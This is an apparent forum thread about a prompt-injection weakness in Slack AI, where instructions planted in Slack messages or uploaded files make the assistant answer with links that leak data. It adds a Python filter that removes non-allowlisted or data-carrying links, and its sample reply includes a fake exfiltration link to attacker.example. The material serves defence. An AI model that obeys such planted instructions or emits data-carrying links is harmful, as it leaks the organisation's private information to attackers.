
I've seen plenty of organizations who run community Slack channels where they invite non-employees in to talk with them - I'm a member of several of those myself.


Hm that's a good point, and we've done that ourselves. I believe we limited those folks to one private channel and didn't allow them to create new channels.

I think of it like an office space. If you bring in some consultants do you set up a space for them and keep them off your VPN, or do you let them run around, sit where they want, and peek over everybody's shoulder to see what they're up to?


The bigger problem here is that Slack AI has a misfeature where malicious instructions can cause it to answer questions with links that leak data. The specific examples aren't as important as the overall class of attack.

Anything you say in Slack - or anything in a document that is available within Slack - could potentially be leaked to an attacker who manages to get their malicious instructions into your Slack. There are many ways they might be able to do that, such as tricking an employee of yours into uploading a file to Slack that includes those instructions.
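One defensive control for the attack class described in this comment, as an added example (not code from Slack or from the commenter): an output filter applied to an assistant reply before it is rendered, which drops any link that points outside an allow-listed set of hosts or that carries query-string or fragment data, the part of a URL an injected instruction would use to smuggle out what the model was shown. The host names and the sample reply are constructed.

```python
import re
from urllib.parse import urlparse

# Deployment-specific allowlist of hosts a reply may link to (constructed example hosts).
ALLOWED_HOSTS = {"example-corp.slack.com", "docs.example-corp.internal"}

# Markdown links/images ([text](url), ![alt](url)) or bare http(s) URLs.
_LINK = re.compile(r"!?\[[^\]]*\]\((https?://[^)\s]+)\)|(https?://[^\s)>\]]*[^\s)>\].,;])")

def classify_link(url: str) -> str:
    """'allow', 'block-host' (unknown domain) or 'block-data' (carries a payload)."""
    p = urlparse(url)
    if (p.hostname or "").lower() not in ALLOWED_HOSTS:
        return "block-host"
    # Even a trusted host must not carry free-form query/fragment data: that is
    # the channel through which an injected instruction can make the model leak
    # the content it was given access to.
    if p.query or p.fragment:
        return "block-data"
    return "allow"

def sanitize_reply(text: str) -> tuple[str, list[tuple[str, str]]]:
    """Strip links that fail classify_link; return (clean_text, [(url, reason)])."""
    removed: list[tuple[str, str]] = []

    def _repl(m: re.Match) -> str:
        url = m.group(1) or m.group(2)
        verdict = classify_link(url)
        if verdict == "allow":
            return m.group(0)
        removed.append((url, verdict))  # keep for logging / alerting
        return "[link removed]"

    return _LINK.sub(_repl, text), removed

# Constructed sample of a reply containing one legitimate link and two that leak.
SAMPLE_REPLY = (
    "The onboarding guide is at https://docs.example-corp.internal/onboarding. "
    "Also [click here](https://attacker.example/collect?secret=API-KEY-ABC123) "
    "and see [search](https://example-corp.slack.com/search?q=token)."
)

if __name__ == "__main__":
    clean, removed = sanitize_reply(SAMPLE_REPLY)
    print(clean)
    for url, reason in removed:
        print(f"removed ({reason}): {url}")
```

The `removed` list is the useful detection signal: a reply that tries to link to an unknown host, or to embed data in a URL, is itself an indicator that untrusted instructions reached the model.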



